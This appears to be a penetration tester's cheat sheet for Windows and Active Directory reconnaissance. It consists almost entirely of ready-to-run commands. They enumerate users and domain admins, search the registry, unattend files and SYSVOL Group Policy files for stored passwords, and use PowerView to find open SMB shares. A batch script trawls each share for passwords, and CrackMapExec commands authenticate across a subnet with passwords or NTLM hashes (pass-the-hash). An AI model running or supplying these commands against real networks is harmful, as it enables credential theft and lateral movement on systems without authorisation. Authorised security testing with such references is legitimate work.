Windows Recon (Cheat Sheet)

0x7a616368
Jul 3

Windows OS Enumeration

net config Workstation
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
hostname
net users
ipconfig /all
route print
arp -A
netstat -ano
netsh firewall show state
netsh firewall show config
schtasks /query /fo LIST /v
tasklist /SVC
net start
DRIVERQUERY
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
dir /s pass == cred == vnc == .config
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

Find Goodies

Service Account Credentials within SYSVOL Group Policy Preferences (GPP)

findstr /S /I cpassword \\domain.com\sysvol\domain.com\policies\*.xml

Find in files and registry

findstr /snip password *.xml *.ini *.txt (quicker than below)
findstr /snip password *
dir /s *password* == *cred* == *vnc* == *.config*
dir c:\*vnc.ini /s /b
c:\sysprep.inf
c:\sysprep\sysprep.xml
c:\unattend.xml
%WINDIR%\Panther\Unattend\Unattended.xml
%WINDIR%\Panther\Unattended.xml
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"

GPO settings

gpresult /z
gpresult /H gpresult.html (for pretty HTML output; /H requires an output filename)

Users, Groups and Privileges

net localgroup administrators /domain
net group "Domain Controllers" /domain
net group "Domain Admins" /domain
net group "Enterprise Admins" /domain
net user /domain <UserName>
Get-ADDomainController -filter * | select hostname, operatingsystem
Get-ADFineGrainedPasswordPolicy -filter *
Get-ADDefaultDomainPasswordPolicy
Get-ADUser <UserName> -Properties *
Get-ADUser -filter * -properties Name, PasswordNeverExpires | where {$_.passwordNeverExpires -eq "true" } | Select-Object DistinguishedName,Name,Enabled
Get-ADGroupMember -identity <GroupName>
Get-ADComputer -filter * | select name
Get-GPO -all | select DisplayName, gpostatus

SMB File Shares

Find Hosts with SMB Open (CrackMapExec)

cme smb 192.168.1.0/24

Find Open Shares (PowerView)

Invoke-ShareFinder -HostList hosts_with_smb.txt -NoPing -CheckShareAccess | Out-File -Encoding ascii found_shares.txt

Permissions (PowerView)

Invoke-FileFinder -ShareList .\found_shares.txt | ForEach-Object {Get-Acl $_.FullName} | Select-Object -Property Path,Owner,Group,AccessToString | Export-Csv Permissions.csv

Find Interesting file names from Share list (PowerView)

Invoke-FileFinder -ShareList found_shares.txt -Terms confidential, password -Verbose | ForEach-Object {Get-Acl $_.FullName} | Format-List

LOLBIN Script to search for in-file passwords in open shares

@echo off
rem Map each share listed in found_shares.txt to Z: in turn and search it for "password"
for /F "tokens=*" %%a in (found_shares.txt) do (
  rem Return to C: first so the previous Z: mapping can be released
  C:
  NET USE Z: /delete /y
  net use z: "%%a"
  Z:
  echo %%a
  rem Write results next to this script (%~dp0) rather than onto the mapped share
  echo %%a >> "%~dp0output_file.txt"
  rem findstr /s recurses, /n numbers lines, /i ignores case, /p skips binary files
  if exist z:\ ( findstr /snip password * >> "%~dp0output_file.txt" )
)

Use password or hash for authentication

cme smb 192.168.1.0/24 -u UserName -H 'LM:NT'
cme smb 192.168.1.0/24 -u UserName -p 'PASSWORDHERE'

Lists

https://github.com/danielmiessler/SecLists